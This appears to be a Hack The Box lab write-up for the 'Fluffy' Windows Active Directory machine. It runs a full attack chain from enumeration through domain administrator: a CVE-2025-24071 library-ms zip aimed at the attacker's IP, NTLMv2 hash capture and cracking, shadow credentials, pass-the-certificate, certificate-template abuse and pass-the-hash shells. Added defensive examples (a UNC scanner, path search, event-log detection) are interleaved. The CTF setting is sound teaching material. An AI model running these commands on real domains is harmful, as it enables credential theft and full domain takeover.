```text
❯ sudo nmap -sC -sV -vv 10.10.11.69 -oN fluffy-output
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-06-14 12:01 +0545
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 12:01
Completed NSE at 12:01, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 12:01
Completed NSE at 12:01, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 12:01
Completed NSE at 12:01, 0.00s elapsed
Initiating Ping Scan at 12:01
Scanning 10.10.11.69 [4 ports]
Completed Ping Scan at 12:01, 0.33s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 12:01
Completed Parallel DNS resolution of 1 host. at 12:01, 0.01s elapsed
Initiating SYN Stealth Scan at 12:01
Scanning 10.10.11.69 [1000 ports]
Discovered open port 53/tcp on 10.10.11.69
Discovered open port 445/tcp on 10.10.11.69
Discovered open port 139/tcp on 10.10.11.69
Discovered open port 88/tcp on 10.10.11.69
Discovered open port 389/tcp on 10.10.11.69
Discovered open port 593/tcp on 10.10.11.69
Discovered open port 636/tcp on 10.10.11.69
Discovered open port 3269/tcp on 10.10.11.69
Discovered open port 464/tcp on 10.10.11.69
Discovered open port 3268/tcp on 10.10.11.69
Not shown: 990 filtered tcp ports (no-response)
PORT     STATE SERVICE       REASON          VERSION
53/tcp   open  domain        syn-ack ttl 127 Simple DNS Plus
88/tcp   open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-06-14 13:16:36Z)
139/tcp  open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.fluffy.htb
| Issuer: commonName=fluffy-DC01-CA/domainComponent=fluffy
445/tcp  open  microsoft-ds? syn-ack ttl 127
464/tcp  open  kpasswd5?     syn-ack ttl 127
593/tcp  open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.fluffy.htb
| Issuer: commonName=fluffy-DC01-CA/domainComponent=fluffy
3268/tcp open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.fluffy.htb
3269/tcp open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-14T13:18:03+00:00; +6h59m59s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.fluffy.htb
| Issuer: commonName=fluffy-DC01-CA/domainComponent=fluffy
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-04-17T16:04:17
| Not valid after:  2026-04-17T16:04:17
| MD5:   2765:a68f:4883:dc6d:0969:5d0d:3666:c880
| SHA-1: 72f3:1d5f:e6f3:b8ab:6b0e:dd77:5414:0d0c:abfe:e681
```
```text
        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        IT              Disk
        NETLOGON        Disk      Logon server share
        SYSVOL          Disk      Logon server share
SMB1 disabled -- no workgroup available
```

```text
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Jun 14 18:59:51 2025
  ..                                  D        0  Sat Jun 14 18:59:51 2025
  a.library-ms                        A      365  Sat Jun 14 19:07:59 2025
  Everything-1.4.1.1026.x64           D        0  Fri Apr 18 20:53:44 2025
  Everything-1.4.1.1026.x64.zip       A  1827464  Fri Apr 18 20:49:05 2025
  KeePass-2.58                        D        0  Fri Apr 18 20:53:38 2025
  KeePass-2.58.zip                    A  3225346  Fri Apr 18 20:48:17 2025
  Upgrade_Notice.pdf                  A   169963  Sat May 17 20:16:07 2025

                5842943 blocks of size 4096. 2073893 blocks available
smb: \>
```
Since the others are executables, I only downloaded Upgrade_Notice.pdf and a.library-ms.
NSFOCUS CERT has detected that Microsoft recently released a security update to address a critical spoofing vulnerability in Windows File Explorer, identified as **CVE-2025-24071**. This vulnerability has a CVSS score of 7.5, indicating its severity. The issue arises from the implicit trust and automatic file parsing behavior of `.library-ms` files in Windows Explorer. An unauthenticated attacker can exploit this vulnerability by constructing RAR/ZIP files containing a malicious SMB path. Upon decompression, this triggers an SMB authentication request, potentially exposing the user's NTLM hash. PoC (Proof of Concept) exploits for this vulnerability are now publicly available, making it a current threat. Affected users are strongly advised to apply the patch immediately to mitigate the risk.
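The advisory above describes the whole problem in one sentence: a `.library-ms` file whose location is an SMB path makes Explorer authenticate outbound when the archive is unpacked. The detection that follows is an added example (not code from the writeup, from the PoC tool it uses, or from NSFOCUS): it opens an archive in memory, looks only at `.library-ms` entries, and flags any that reference a UNC path, which is the property a mail gateway or file-share monitor would want to catch before a user extracts the file. The sample archive is constructed inline; `192.0.2.10` is a documentation address, and the library descriptions are trimmed to the one element the scanner cares about (real files carry an XML namespace and more nesting, which the scanner does not depend on).

```python
"""Scan an archive for .library-ms entries that point at remote (UNC) locations.

Added example for the CVE-2025-24071 description; not code from the writeup or
from any tool it mentions. The sample archive is constructed in memory.
"""
import io
import re
import zipfile

# A UNC path: two backslashes, a host, a backslash, then a share name.
UNC_RE = re.compile(r"\\\\[A-Za-z0-9._-]+\\[^\\\s<>\"']+")


def find_unc_paths(text):
    """Return every UNC path that appears in the text of a library file."""
    return UNC_RE.findall(text)


def scan_archive(zip_bytes):
    """Map each .library-ms entry in the archive to the UNC paths it contains.

    The extension is matched case-insensitively and nested directories are
    included: Explorer acts on the extension, not on where the file sits.
    """
    findings = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir() or not info.filename.lower().endswith(".library-ms"):
                continue
            text = zf.read(info).decode("utf-8", errors="replace")
            findings[info.filename] = find_unc_paths(text)
    return findings


def is_suspicious(findings):
    """An archive is suspicious if any library entry references a UNC path."""
    return any(paths for paths in findings.values())


# --- constructed sample input ---------------------------------------------
# Trimmed library descriptions (assumption: real files carry a namespace and
# more elements; the scanner only reads the textual content, so this suffices).
CLEAN = ('<?xml version="1.0"?><libraryDescription>'
         '<url>C:\\Users\\Public\\Documents</url></libraryDescription>')
REMOTE = ('<?xml version="1.0"?><libraryDescription>'
          '<url>\\\\192.0.2.10\\share</url></libraryDescription>')


def build_sample_archive():
    """Constructed zip: one local library, one remote library, one text file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("docs/clean.library-ms", CLEAN)
        zf.writestr("docs/remote.library-ms", REMOTE)
        zf.writestr("readme.txt", "not a library file")
    return buf.getvalue()


if __name__ == "__main__":
    result = scan_archive(build_sample_archive())
    for name, paths in result.items():
        print(f"{name}: {paths or 'no remote locations'}")
    print("suspicious:", is_suspicious(result))
```

The scan is deliberately content-based rather than extension-only: a `.library-ms` pointing at a local folder is how Windows Libraries normally work, so only the remote-location case is reported, and the host and share are returned so an analyst can see where the authentication would have gone.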
```text
Windows File Explorer Spoofing Vulnerability (CVE-2025-24071) by ThemeHackers

Creating exploit with filename: evil.library-ms.library-ms
Target IP: 10.10.14.65

Generating library file...
✓ Library file created successfully

Creating ZIP archive...
✓ ZIP file created successfully

Cleaning up temporary files...
✓ Cleanup completed

Process completed successfully!
Output file: exploit.zip
Run this file on the victim machine and you will see the effects of the vulnerability such as using ftp smb to send files etc.
```

```text
❯ ls
env  exploit.py  exploit.zip  hi.txt  LICENSE  README.md  requirements.txt
```
Running Responder simultaneously in another tab to capture the NTLM hash.
```text
[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [OFF]
    Auth proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]
    MQTT server                [ON]
    RDP server                 [ON]
    DCE-RPC server             [ON]
    WinRM server               [ON]
    SNMP server                [ON]
```

```text
Try "help" to get a list of possible commands.
smb: \> put exploit.zip
putting file exploit.zip as \exploit.zip (0.3 kb/s) (average 0.3 kb/s)
smb: \> dir
  .                                   D        0  Sat Jun 14 19:41:52 2025
  ..                                  D        0  Sat Jun 14 19:41:52 2025
  a.library-ms                        A      365  Sat Jun 14 19:07:59 2025
  Everything-1.4.1.1026.x64           D        0  Fri Apr 18 20:53:44 2025
  Everything-1.4.1.1026.x64.zip       A  1827464  Fri Apr 18 20:49:05 2025
  exploit.zip                         A      338  Sat Jun 14 19:41:52 2025
  hi.txt                              A        0  Sat Jun 14 19:28:39 2025
  KeePass-2.58                        D        0  Fri Apr 18 20:53:38 2025
  KeePass-2.58.zip                    A  3225346  Fri Apr 18 20:48:17 2025
  Upgrade_Notice.pdf                  A   169963  Sat May 17 20:16:07 2025

                5842943 blocks of size 4096. 2073089 blocks available
smb: \>
```
```text
❯ john hash.txt --format=netntlmv2 --wordlist=/usr/share/wordlists/rockyou.txt
Created directory: /home/htb-ac-1518820/.john
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
prometheusx-303  (p.agila)
1g 0:00:00:01 DONE (2025-06-14 02:06) 0.5263g/s 2377Kp/s 2377Kc/s 2377KC/s proquis..programmercomputer
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
```
We got the password for p.agila, which is prometheusx-303.
```text
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: fluffy.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: dc01.fluffy.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.fluffy.htb
INFO: Found 10 users
INFO: Found 54 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.fluffy.htb
ERROR: Unhandled exception in computer DC01.fluffy.htb processing: The NETBIOS connection with the remote host timed out.
INFO: Traceback (most recent call last):
  File "/home/at0m/Hentai/HTB/fluffy/pywhisker/env/lib/python3.12/site-packages/impacket/nmb.py", line 986, in non_polling_read
    received = self._sock.recv(bytes_left)
               ^^^^^^^^^^^^^^^^^^^^^^^^^^^
<SNIP>
impacket.nmb.NetBIOSTimeout: The NETBIOS connection with the remote host timed out.
INFO: Done in 00M 41S
INFO: Compressing output into 20250616202152_bloodhound.zip
```
Messy, but we seem to have gotten something in the .zip.
BloodHound GUI
Follow the GitHub instructions, then open the site, log in and upload the zip file 20250616202152_bloodhound.zip.
p.agila is a member of Service Account Managers.

Service Account Managers has GenericAll over Service Accounts (GenericAll lets the holder take full control of the target object, usually a user or computer account).

And Service Accounts has GenericWrite over three accounts (GenericWrite lets you change some parts of the account, such as adding it to a group or changing certain attributes, but not fully control or take over the account the way GenericAll does). Of those three I chose WINRM_SVC.

Now, finally, this is the whole map.
Summary
The user p.agila is a member of SERVICE ACCOUNT MANAGERS, and this group has GenericAll over the SERVICE ACCOUNTS group; SERVICE ACCOUNTS in turn has GenericWrite over the ca_svc, ldap_svc and winrm_svc accounts. With the GenericAll right we can directly modify the group's members, so we can add p.agila to SERVICE ACCOUNTS, and after that we can perform a Shadow Credentials attack against any of the accounts just mentioned.

Adding p.agila to Service Accounts.
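The summary above is exactly the kind of question BloodHound answers by graph search: which chain of membership and ACL edges connects one principal to another. The following is an added example, not code from the writeup or from BloodHound itself: it encodes the five relationships named in the summary as a tiny edge list and runs a breadth-first search over them, both in the attacker's direction (what can p.agila reach?) and in the defender's direction (who can reach winrm_svc?). The node names are the writeup's; the graph holds nothing else and is constructed here.

```python
"""Attack-path search over a small BloodHound-style edge graph.

Added example; not code from the writeup or from BloodHound. The edge list is
constructed from the relationships the writeup's summary names.
"""
from collections import deque

# (source, edge type, target). MemberOf is plain group membership; the other
# two are ACL rights the source holds over the target.
EDGES = [
    ("p.agila", "MemberOf", "SERVICE ACCOUNT MANAGERS"),
    ("SERVICE ACCOUNT MANAGERS", "GenericAll", "SERVICE ACCOUNTS"),
    ("SERVICE ACCOUNTS", "GenericWrite", "ca_svc"),
    ("SERVICE ACCOUNTS", "GenericWrite", "ldap_svc"),
    ("SERVICE ACCOUNTS", "GenericWrite", "winrm_svc"),
]

# Edge types that actually confer control (and so may be traversed), with the
# reason each one matters to a reviewer of the path.
TRAVERSABLE = {
    "MemberOf": "inherits every right granted to the group",
    "GenericAll": "full control of the target (can add members / write any attribute)",
    "GenericWrite": "can write non-protected attributes (e.g. msDS-KeyCredentialLink)",
}


def build_adjacency(edges):
    """source -> [(edge type, target), ...] for traversable edges only."""
    adj = {}
    for src, kind, dst in edges:
        if kind in TRAVERSABLE:
            adj.setdefault(src, []).append((kind, dst))
    return adj


def find_path(edges, start, goal):
    """BFS; returns the shortest list of (src, edge, dst) hops, or None."""
    adj = build_adjacency(edges)
    queue = deque([(start, [])])
    seen = {start}
    while queue:
        node, path = queue.popleft()
        if node == goal:
            return path
        for kind, nxt in adj.get(node, []):
            if nxt not in seen:
                seen.add(nxt)
                queue.append((nxt, path + [(node, kind, nxt)]))
    return None


def who_controls(edges, target):
    """Defender's view: every principal with some path to the target."""
    nodes = {n for src, _, dst in edges for n in (src, dst)}
    return {n for n in nodes if n != target and find_path(edges, n, target) is not None}


def explain(path):
    """One human-readable line per hop, with why that hop is traversable."""
    return [f"{src} --{kind}--> {dst}: {TRAVERSABLE[kind]}" for src, kind, dst in path]


if __name__ == "__main__":
    route = find_path(EDGES, "p.agila", "winrm_svc")
    print("\n".join(explain(route)))
    print("principals that can reach winrm_svc:", sorted(who_controls(EDGES, "winrm_svc")))
```

The defender-side query is the useful one when deciding what to fix: `who_controls` shows that breaking either the GenericAll edge onto SERVICE ACCOUNTS or the GenericWrite edges from it removes p.agila's path entirely, whereas resetting a single service account's credential would not.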
```text
❯ net rpc group addmem "SERVICE ACCOUNTS" "p.agila" -U "FLUFFY.HTB"/"p.agila"%"prometheusx-303" -S "DC01.FLUFFY.HTB"
```
Shadow Credentials
Pass the Certificate
Reference: Password Attacks
Making an X.509 certificate to obtain a TGT and the NT hash.
Using pywhisker.py to add p.agila to the access control list (ACL) of winrm_svc
```text
[*] Searching for the target account
[*] Target user found: CN=winrm service,CN=Users,DC=fluffy,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: 18e8482b-97cd-fe5d-cb29-5a6e833846a6
[*] Updating the msDS-KeyCredentialLink attribute of winrm_svc
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[*] Converting PEM -> PFX with cryptography: RsWeZjev.pfx
[+] PFX exportiert nach: RsWeZjev.pfx
[i] Passwort für PFX: 4QdYa1JOlN65ml8sJJyu
[+] Saved PFX (#PKCS12) certificate & key at path: RsWeZjev.pfx
[*] Must be used with password: 4QdYa1JOlN65ml8sJJyu
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
```
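Both directory changes made so far leave a trace on the domain controller: adding p.agila to SERVICE ACCOUNTS is logged as a group membership change, and pywhisker's write to `msDS-KeyCredentialLink` is logged as a directory object modification when the attribute is audited. The code below is an added example of the detection logic, not code from the writeup or from pywhisker. It runs over constructed Windows Security events in JSON-lines form, using the field names a SIEM normally extracts from event 4728 (member added to a security-enabled global group) and event 5136 (directory service object modified). The account, group and DN values are taken from the writeup; the allow-list, the watched-group set and the event records themselves are assumptions made for the example.

```python
"""Detect group-membership changes on watched groups and msDS-KeyCredentialLink
writes made by a principal other than the object's own account.

Added example; not code from the writeup or from pywhisker. Event records are
constructed; field names follow the Security log's 4728 / 5136 schema.
"""
import json

# Groups whose membership changes should always be reviewed (assumption: a
# defender lists the groups that sit on known attack paths).
WATCHED_GROUPS = {"SERVICE ACCOUNTS", "SERVICE ACCOUNT MANAGERS"}

# Service principals allowed to write key credentials for other objects
# (assumption: left empty here; a real deployment fills this in).
KEYCRED_WRITERS_ALLOWED = frozenset()

# Constructed sample log: two changes matching the writeup, one routine
# self-write by a domain controller, and one unrelated logon event.
SAMPLE_EVENTS = "\n".join([
    json.dumps({"EventID": 4728, "SubjectUserName": "p.agila",
                "TargetUserName": "SERVICE ACCOUNTS",
                "MemberName": "CN=p.agila,CN=Users,DC=fluffy,DC=htb"}),
    json.dumps({"EventID": 5136, "SubjectUserName": "p.agila",
                "ObjectDN": "CN=winrm service,CN=Users,DC=fluffy,DC=htb",
                "AttributeLDAPDisplayName": "msDS-KeyCredentialLink",
                "OperationType": "Value Added"}),
    json.dumps({"EventID": 5136, "SubjectUserName": "DC01$",
                "ObjectDN": "CN=DC01,OU=Domain Controllers,DC=fluffy,DC=htb",
                "AttributeLDAPDisplayName": "msDS-KeyCredentialLink",
                "OperationType": "Value Added"}),
    json.dumps({"EventID": 4624, "SubjectUserName": "p.agila"}),
])


def parse_events(jsonl):
    """One dict per non-empty JSON line."""
    return [json.loads(line) for line in jsonl.splitlines() if line.strip()]


def rdn_name(dn):
    """First RDN value of a DN: 'CN=winrm service,CN=Users,...' -> 'winrm service'."""
    return dn.split(",", 1)[0].split("=", 1)[1]


def self_write(subject, object_dn):
    """A computer account writing its own object (DC01$ -> CN=DC01) is routine."""
    return subject.rstrip("$").lower() == rdn_name(object_dn).lower()


def detect(events):
    """Return (rule, subject, target) tuples for every event that matches."""
    alerts = []
    for ev in events:
        eid = ev.get("EventID")
        subj = ev.get("SubjectUserName", "")
        if eid == 4728 and ev.get("TargetUserName") in WATCHED_GROUPS:
            alerts.append(("watched-group-membership-change", subj, ev["TargetUserName"]))
        elif (eid == 5136
              and ev.get("AttributeLDAPDisplayName") == "msDS-KeyCredentialLink"
              and subj not in KEYCRED_WRITERS_ALLOWED
              and not self_write(subj, ev["ObjectDN"])):
            alerts.append(("keycredentiallink-write-by-other", subj, ev["ObjectDN"]))
    return alerts


if __name__ == "__main__":
    for rule, subject, target in detect(parse_events(SAMPLE_EVENTS)):
        print(f"{rule}: {subject} -> {target}")
```

Event 5136 only appears when a SACL on the user objects audits writes to `msDS-KeyCredentialLink`, so the second rule has a precondition the first does not; without that audit entry the pywhisker step above is silent in the Security log.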
We got RsWeZjev.pfx and its password 4QdYa1JOlN65ml8sJJyu, which we can use to obtain a TGT with PKINITtools.
A .pfx file (also known as PKCS#12 or Personal Information Exchange format) is a binary format that bundles a certificate and its corresponding private key — often used to authenticate a user or machine.
```text
❯ ls
__init__.py  RsWeZjev_cert.pem  RsWeZjev_priv.pem  pywhisker.py  RsWeZjev.pfx
```
PKINITTools
We can now perform a Pass-the-Certificate attack to obtain a TGT as winrm_svc.
```text
2025-06-16 21:45:23,832 minikerberos INFO     Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2025-06-16 21:45:23,922 minikerberos INFO     Requesting TGT
INFO:minikerberos:Requesting TGT
Traceback (most recent call last):
  File "/home/at0m/Hentai/HTB/fluffy/PKINITtools/gettgtpkinit.py", line 349, in <module>
    main()
  File "/home/at0m/Hentai/HTB/fluffy/PKINITtools/gettgtpkinit.py", line 345, in main
    amain(args)
  File "/home/at0m/Hentai/HTB/fluffy/PKINITtools/gettgtpkinit.py", line 315, in amain
    res = sock.sendrecv(req)
          ^^^^^^^^^^^^^^^^^^
  File "/home/at0m/Hentai/HTB/fluffy/pywhisker/env/lib/python3.12/site-packages/minikerberos/network/clientsocket.py", line 85, in sendrecv
    raise KerberosError(krb_message)
minikerberos.protocol.errors.KerberosError: Error Name: KRB_AP_ERR_SKEW Detail: "The clock skew is too great"
```
Note: Kerberos is very sensitive to time differences; the default tolerance is usually 5 minutes. If your system's clock is more than that ahead of or behind the DC's, authentication fails as shown above.
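The skew was visible long before the Kerberos error: the Nmap header records the scanner's start time (`2025-06-14 12:01 +0545`), the port 88 banner records the KDC's time (`server time: 2025-06-14 13:16:36Z`), and the `ssl-date` script already printed `+6h59m59s from scanner time`. The following is an added example, not code from the writeup or from Nmap or minikerberos: it parses those three values and decides whether a Kerberos exchange would pass the 5-minute tolerance, so the check can be done from the scan output before any ticket request. The 300-second limit is the Windows default; the time strings are the ones quoted above, and nothing else is assumed.

```python
"""Kerberos clock-skew check from timestamps found in a scan.

Added example; not code from the writeup, Nmap or minikerberos. Input strings
are the ones the writeup's Nmap output shows.
"""
import re
from datetime import datetime, timezone

# Windows default for "Maximum tolerance for computer clock synchronization".
DEFAULT_MAX_SKEW = 300

# Nmap's ssl-date token, e.g. "+6h59m59s", "-2m3s", "+1d0h0m0s".
_SKEW_TOKEN = re.compile(r"^([+-])(?:(\d+)d)?(?:(\d+)h)?(?:(\d+)m)?(?:(\d+)s)?$")


def parse_nmap_skew(token):
    """'+6h59m59s' -> 25199 seconds; sign is preserved ('-2m3s' -> -123)."""
    m = _SKEW_TOKEN.match(token.strip())
    if not m:
        raise ValueError(f"unrecognised skew token: {token!r}")
    sign, d, h, mi, s = m.groups()
    total = int(d or 0) * 86400 + int(h or 0) * 3600 + int(mi or 0) * 60 + int(s or 0)
    return -total if sign == "-" else total


def skew_seconds(local_header_time, kdc_time):
    """Seconds the KDC clock is ahead (+) or behind (-) the scanner's clock.

    local_header_time is Nmap's "Starting Nmap ... at YYYY-MM-DD HH:MM +ZZZZ"
    timestamp; kdc_time is the "server time: ...Z" value from the Kerberos
    banner. The header has minute precision, so the result is approximate.
    """
    local = datetime.strptime(local_header_time, "%Y-%m-%d %H:%M %z")
    kdc = datetime.strptime(kdc_time, "%Y-%m-%d %H:%M:%SZ").replace(tzinfo=timezone.utc)
    return int((kdc - local).total_seconds())


def within_tolerance(skew, max_skew=DEFAULT_MAX_SKEW):
    """True if a KDC would accept a request with this much skew."""
    return abs(skew) <= max_skew


def diagnose(skew, max_skew=DEFAULT_MAX_SKEW):
    """Short verdict string for a report."""
    direction = "ahead of" if skew > 0 else "behind"
    verdict = "within" if within_tolerance(skew, max_skew) else "outside"
    return f"KDC is {abs(skew)}s {direction} this host: {verdict} the {max_skew}s tolerance"


if __name__ == "__main__":
    from_banner = skew_seconds("2025-06-14 12:01 +0545", "2025-06-14 13:16:36Z")
    from_ssl_date = parse_nmap_skew("+6h59m59s")
    print(diagnose(from_banner))
    print(diagnose(from_ssl_date))
```

The two estimates differ by a few tens of seconds because the Nmap header only carries minutes; either one is enough to predict the `KRB_AP_ERR_SKEW` the BloodHound and PKINITtools runs both hit, and on the defensive side the same check applied to any client's AS-REQ timestamps is what the KDC is doing when it returns that error.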
```text
2025-06-16 23:08:28,509 minikerberos INFO     Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2025-06-16 23:08:28,635 minikerberos INFO     Requesting TGT
INFO:minikerberos:Requesting TGT
2025-06-16 23:08:35,164 minikerberos INFO     AS-REP encryption key (you might need this later):
INFO:minikerberos:AS-REP encryption key (you might need this later):
2025-06-16 23:08:35,164 minikerberos INFO     9d38cd84e881a213f84e1d9dd8b48e1e38f52e35bcd7687de2d72dd229a0a104
INFO:minikerberos:9d38cd84e881a213f84e1d9dd8b48e1e38f52e35bcd7687de2d72dd229a0a104
2025-06-16 23:08:35,206 minikerberos INFO     Saved TGT to file
INFO:minikerberos:Saved TGT to file
```
We got the AS-REP encryption key; with the TGT and that key we can now recover the NT hash and perform a Pass-the-Hash attack.
```text
❯ ls
getnthash.py  gettgtpkinit.py  ntlmrelayx  requirements.txt  gets4uticket.py  LICENSE  README.md  winrm_svc.ccache
```

```text
/home/at0m/Hentai/HTB/fluffy/pywhisker/env/lib/python3.12/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
  import pkg_resources
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Using TGT from cache
[*] Requesting ticket to self with PAC
Recovered NT Hash
33bd09dcd697600edf6b3a7af4875767
```
We got the NT hash 33bd09dcd697600edf6b3a7af4875767; now we can perform PTH.
Pass The Hash
```text
❯ evil-winrm -i 10.10.11.69 -u winrm_svc -H 33bd09dcd697600edf6b3a7af4875767

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\winrm_svc\Documents>
```

And we are in.
User Flag
```text
*Evil-WinRM* PS C:\Users\winrm_svc\Documents> dir ../Desktop
```
```text
[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Finding issuance policies
[*] Found 14 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'fluffy-DC01-CA' via RRP
[*] Successfully retrieved CA configuration for 'fluffy-DC01-CA'
[*] Checking web enrollment for CA 'fluffy-DC01-CA' @ 'DC01.fluffy.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Saving text output to '20250617053904_Certipy.txt'
[*] Wrote text output to '20250617053904_Certipy.txt'
[*] Saving JSON output to '20250617053904_Certipy.json'
[*] Wrote JSON output to '20250617053904_Certipy.json'
```

```text
[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Finding issuance policies
[*] Found 14 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'fluffy-DC01-CA' via RRP
[*] Successfully retrieved CA configuration for 'fluffy-DC01-CA'
[*] Checking web enrollment for CA 'fluffy-DC01-CA' @ 'DC01.fluffy.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Saving text output to '20250617125639_Certipy.txt'
[*] Wrote text output to '20250617125639_Certipy.txt'
[*] Saving JSON output to '20250617125639_Certipy.json'
[*] Wrote JSON output to '20250617125639_Certipy.json'
```
```text
❯ certipy shadow \
    -u 'p.agila@fluffy.htb' -p 'prometheusx-303' \
    -dc-ip '10.10.11.69' -account 'ca_svc' \
    auto
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Targeting user 'ca_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID 'fee645ec0bcc4bb6bdfbe51991c0c41b'
[*] Adding Key Credential with device ID 'fee645ec0bcc4bb6bdfbe51991c0c41b' to the Key Credentials for 'ca_svc'
[*] Successfully added Key Credential with device ID 'fee645ec0bcc4bb6bdfbe51991c0c41b' to the Key Credentials for 'ca_svc'
[*] Authenticating as 'ca_svc' with the certificate
[*] Certificate identities:
[*]     No identities found in this certificate
[*] Using principal: 'ca_svc@fluffy.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'ca_svc.ccache'
[*] Wrote credential cache to 'ca_svc.ccache'
[*] Trying to retrieve NT hash for 'ca_svc'
[*] Restoring the old Key Credentials for 'ca_svc'
[*] Successfully restored the old Key Credentials for 'ca_svc'
[*] NT hash for 'ca_svc': ca0f4f9e9eb8a092addf53bb03fc98c8
```

```text
❯ export KRB5CCNAME=ca_svc.ccache
```
Step 4: Request a certificate as the “victim” user from any suitable client authentication template (e.g., “User”)
```text
[!] DC host (-dc-host) not specified and Kerberos authentication is used. This might fail
[*] Requesting certificate via RPC
[*] Request ID is 23
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'
```

```text
[*] Certificate identities:
[*]     SAN UPN: 'administrator'
[*] Using principal: 'administrator@fluffy.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@fluffy.htb': aad3b435b51404eeaad3b435b51404ee:8da83a3fa618b6e3a00e93f676c92a6e
```

Yusss! We got the hash; now we can just perform Pass the Hash to connect.
Root by Pass The Hash
```text
❯ evil-winrm -i 10.10.11.69 -u administrator -H 8da83a3fa618b6e3a00e93f676c92a6e

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

